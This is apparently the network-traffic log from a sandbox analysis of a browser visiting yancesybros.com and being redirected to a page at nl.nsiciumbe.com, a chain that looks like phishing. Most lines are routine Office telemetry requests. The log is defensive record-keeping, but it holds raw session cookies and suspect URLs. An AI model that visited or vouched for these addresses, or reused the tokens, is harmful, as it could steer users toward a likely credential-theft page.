Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1Host: yancesybros.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=BykMC4YVH19jXVBD1vZm_9dQq__54HBoZInYarys1tM-1732560228-1.2.1.1-SFtIe0bMWScEvSPqnkxQ9E8TfXhK1qVPtqTCFRD7UKzmNiXsi6b7zwASMAfKIyJJzNrV2eKhtFw0WkBBGpnA6kpowXeCGzifYCUBGUO1BLeVeipwColDmbh_x83xSRMnpWErKrRqP.QtunH5HTfp_GPZQCmI2ypHTAqmSimygPgztnyf_VCKTT4LzeeM9wmWDiRuzkKS9Up0uKXyaxdl45QIn9wGxexqWGaW1LdpCDfURSY6y6n1AHu_DjerAtiEtA1ivgH.qZACFjMMf6CbN7qYGdX8JRGEhHFenSnNxJR6KcSyqSSUKf6F2_zXZvrDIbNF_mJVWeg.iv7Jid4jtzoHeZpVDUqz4sS2W_n6gxG4PLZvkLM.Z3dbEfxD2kBvmbtJPIgiDjzdQ8L2zO_tTA6HkV3bRdJpz8jeL2vopAHjxm3oevaGarg_rMzwsTLs
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1Host: yancesybros.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aXqrQHt/ HTTP/1.1Host: nl.nsiciumbe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://yancesybros.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nl.nsiciumbe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nl.nsiciumbe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nl.nsiciumbe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nl.nsiciumbe.com/aXqrQHt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IndoT3E0amV6TWI2QjYwVmZyQm44d3c9PSIsInZhbHVlIjoidTE4bGl2ellacHF0aVl5clFaUDc0NVhpdFlWQ1dlNG9XNDZzMzZwWm5IY0g2M2dLM1FOKzljRXhiMCtyYmR6eG50UEE3cU5Id3JJNFdTdXV6OXlBVUpjVGd0SjZkSVJCR3pJL2ZFazVDRjhHTkJoQjc3bTMvdFdrVXVxYkZiMEYiLCJtYWMiOiJmZTMwOTBjZjgzZWE5NzEyY2NiMjFlODg0MDRiMmQwY2Y1MDM0Y2NmZWI2MGMxMzVjNzU0Y2ExY2JjNzgxOTAzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxsVERWZVRpWW5DbndndkJhdnRyOXc9PSIsInZhbHVlIjoiQ3AyajRiVlJBa0dsRHNLallKVFZncjE5ZnZaZGlqVW81dGcyY0MzU0QraHpzMC9jWHZTK3JZYWs1enJEZ1JoVTFYYW1JR1JQZU85OHN2NmhTR0NVSENVN0UxUFNaM2JTWklaYmN4U3prMHRXbGdleHhoQ0hDRFVwMXJtYWI2S0YiLCJtYWMiOiJhNjc1MjFhMTY1ZDdmMDFiOTc0M2E5MDM0ZDg3MTQ5Mzk5NGMxZGE3ZTZjMzU4NzBkNzYxYTY1NTMzNWM1NTZmIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pTKuk7a711u7zdz&MD=9dooWE6s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: yancesybros.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: choicesff.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nl.nsiciumbe.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
Source: unknownHTTP traffic detected: POST /report/v4?s=3c6QTTvejV081hWYQg2nYd3f1J%2FkO%2F7al7UIK1r9Qa6a%2FYTKquwi7RMLTpYKTruLukdtPuMi4Fnq69aCqjwmEx98A%2FQcH75wH7Mupwi51mF5PLQ6bKl7EveK4k%2Fha03iwe8%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 401Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 25 Nov 2024 18:43:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 25 Nov 2024 18:43:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:43:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: ASP.NETx-powered-by-plesk: PleskWinstrict-transport-security: max-age=15768000; includeSubDomainsCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BfIgxNoyxyiDOUKugheYkahpcvFehr32wAX%2FeL20Z4lRDQh0eXlcmW1yqQ3SKd17ATnFnv59Vp9uRcSug0U0WY9zd5boLiIHsHWA%2FGzxCi3%2BCrW1XkoMeq2jVOvpdL%2BfYs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83c970af5c0fa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1539&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=1451&delivery_rate=183255&cwnd=238&unsent_bytes=0&cid=f000c4f032062086&ts=900&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:43:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: aNQNA3bjAJeZvVB8w5FYXGZVP3TnQIgbI9A=$SdpV/zW4rCfylIWtcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8t%2FpnWgJycK9h5psXdY9xDlhVdxosPE7Wj6U%2BIcEZt8It7tU8bXqPJw6UvIh%2FV6TJaIa9Vj9nhGDZR9LZZg1DwPWctr832xRYwSik2LlaJ43TDPvhmfRSIUtnS94bV6P8zw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83c9845bc6c326-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1520&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1166&delivery_rate=1907250&cwnd=252&unsent_bytes=0&cid=7e4ef2df29ca64d0&ts=477&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:44:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: sf34ndK2POk4mVYHFRGNBhHtm3aIR8XCm+M=$nhe1nX67ke0WvDPJcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e83c9aa9f2f4299-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:44:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: aAb7Dt1EwrtR0S8uvn9Sign+YUMdgrWvYtg=$jypVGmWywCGJCKmycache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e83c9cffad67d05-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:44:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: FA6JQ2QziLMxHHQZjvDeyIW24h6xr74q9CU=$f8W3dU21+qTSuBbzcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e83ca20af9480da-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:44:24 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: XxO7bkbYo7cJHR0ukY/SVoeZl5ZodW66XcE=$d3J0M89Qd/JqivxHReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FBxDtn03FYeX6svEevnC2MFPFVVNbc39XbEHrn4zfxtb24FzPVrRT17fZxDGj4YLQ5lrvgRHRi%2FtaXRu%2BRdXGZLgRCXJEAL1axbi%2BFBEYSuud%2BVAqJ%2FNFWEWAlg8R6TNCI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83ca33996c8ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1166&delivery_rate=1458541&cwnd=252&unsent_bytes=0&cid=5b58afd9f5c42c12&ts=506&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:44:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ek%2F%2FV9upZKQuA%2FRHsyDfpn47ZTf5WV0rEtxgVmOKzFXP3eAKsy%2B33ZlWUTfyyBQAA9MB2qhwLMuHT0x11KU2PV%2Bf8Q9z%2FlueFzpcogQmGAuYAq%2BQhWFzbFEQjmxBwg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3027&sent=233&recv=109&lost=0&retrans=1&sent_bytes=244953&recv_bytes=11849&delivery_rate=13410958&cwnd=287&unsent_bytes=0&cid=dfaf8d8df51a1fa9&ts=1345870&x=0"CF-Cache-Status: HITAge: 27Server: cloudflareCF-RAY: 8e83ca8dac1b41d3-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2143&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1897&delivery_rate=1405873&cwnd=224&unsent_bytes=0&cid=a16f948e74470f5c&ts=7918&x=0"
